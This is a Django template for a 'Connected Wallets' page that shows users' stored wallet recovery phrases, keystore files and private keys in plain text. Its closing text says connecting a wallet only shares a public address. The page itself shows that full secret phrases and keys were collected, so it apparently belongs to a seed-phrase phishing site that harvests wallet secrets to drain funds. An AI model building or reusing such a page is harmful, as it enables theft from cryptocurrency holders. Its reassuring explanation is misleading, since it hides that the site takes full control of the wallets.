{% extends 'partials/base.html' %}
{% load static %}


{% block content %}


    <div class="pt-55 pb-80">
        <div class="tf-container">
            <div class="mt-4 search-box box-input-field">
                
            </div>
            <h5 class="mt-20">Connected Wallets</h5>
            <div class="swiper tf-swiper swiper-wrapper-r mt-12" data-space-between="12" data-preview="1.3" data-tablet="2.3" data-desktop="3">
                <div class="swiper-wrapper">
                    
                    {% if phrase %}

                        {% for p in phrase %}
                            <div class="swiper-slide">
                                <div class="accent-box-v5 bg-menuDark active">
                                    <span class="icon-box bg-icon1"><i class="icon-book"></i></span>
                                    <div class="mt-12">
                                        <p class="text-small mb-2">Wallet Name: &nbsp; <span class="text-success">{{p.wallet_name}}</span></p>

                                        <p class="text-small">{{p.phrase}}</p>

                                        <p class="mt-4 text-danger" style="text-transform: uppercase;">
                                            {{p.content}}
                                        </p>

                                    </div>
                                </div>
                            </div>
                        {% endfor %}

                        {% for k in key_store %}
                            <div class="swiper-slide">
                                <div class="accent-box-v5 bg-menuDark active">
                                    <span class="icon-box bg-icon1"><i class="icon-book"></i></span>
                                    <div class="mt-12">
                                        <p class="text-small mb-2">Wallet Name: &nbsp; <span class="text-success">{{k.wallet_name}}</span></p>

                                        <p class="text-small">{{k.key_store}}</p>

                                        <p class="mt-4 text-danger" style="text-transform: uppercase;">
                                            {{k.content}}
                                        </p>

                                    </div>
                                </div>
                            </div>
                        {% endfor %}

                        {% for p in private_key %}
                            <div class="swiper-slide">
                                <div class="accent-box-v5 bg-menuDark active">
                                    <span class="icon-box bg-icon1"><i class="icon-book"></i></span>
                                    <div class="mt-12">
                                        <p class="text-small mb-2">Wallet Name: &nbsp; <span class="text-success">{{p.wallet_name}}</span></p>

                                        <p class="text-small">{{p.private_key}}</p>

                                    </div>
                                </div>
                            </div>
                        {% endfor %}

                    {% else %}

                        <p class="text-danger">
                            No Wallet Connected

                            <br> <br> 
                        
                            <a href="{% url 'core:all_wallets' %}">Connect Wallets Now &nbsp; <i class="icon-arr-right fs-10 text-secondary" ></i> </a>
                        </p>
                                                
                    {% endif %}         
                                           
                </div>
            </div>

            <p class="mt-12">
                A connected wallet refers to a cryptocurrency wallet that is linked to a website, app, or decentralized platform (dApp) to enable blockchain-based interactions — such as trading, staking, minting NFTs, or accessing DeFi services.
            </p>

            <p class="mt-12">
                A connected wallet allows users to authenticate and transact directly on blockchain platforms without creating traditional accounts. When you “connect” a wallet, you’re granting the site permission to view your public address and initiate transactions (which you must approve manually).
            </p>
            
        </div>
    </div>

{% endblock content %}
    